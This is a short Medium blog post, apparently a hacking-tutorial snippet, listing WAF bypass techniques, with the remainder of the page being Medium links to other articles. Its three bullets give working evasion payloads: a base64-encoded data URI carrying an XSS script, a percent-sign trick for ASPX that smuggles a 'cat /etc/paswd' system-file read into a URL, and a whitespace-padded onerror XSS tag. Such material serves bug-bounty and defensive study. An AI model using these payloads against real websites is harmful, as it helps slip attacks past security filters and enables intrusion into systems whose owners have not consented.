WAF Bypass Checklist

Photo by Sigmund on Unsplash

Generic techniques

  • Base64 encoding our payload (/?q=<data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=_)
  • ASPX removes % not followed by two hex characters (https://site.com/index.php?%file=cat /etc/paswd)
  • We can use spaces to fool a WAF (<Img src = x onerror = “javascript: window.onerror = alert; throw XSS”>)

--

--

--

No b*llshit Hacking tutorials with extreme value in short bursts

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Could Apple be your next DNS Service?

Apple HomePod mini

Because we aim for security and privacy, PrivacySwap has been reviewed and listed at RugDoctor

NewKlayPunks X Kai Protocol Official Partnership Announcement

Oh, The Threats You Will Block!

What’s Up Tornado — What About Some In-house Cleaning?

OSINT Recon Great? — Unique Usernames Are Better Than Unique Passwords

Analysis of Spring MVC Directory Traversal Vulnerability (CVE-2018–1271)

Update on progress & token sale report

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Thexssrat

Thexssrat

No b*llshit Hacking tutorials with extreme value in short bursts

More from Medium

X-XSS-Protection headers. Protection or vulnerability?

Top 25 Subdomain Takeover Bug Bounty Reports

How to hunt for bug bounties

Privilege Escalation (Linux) — Part 1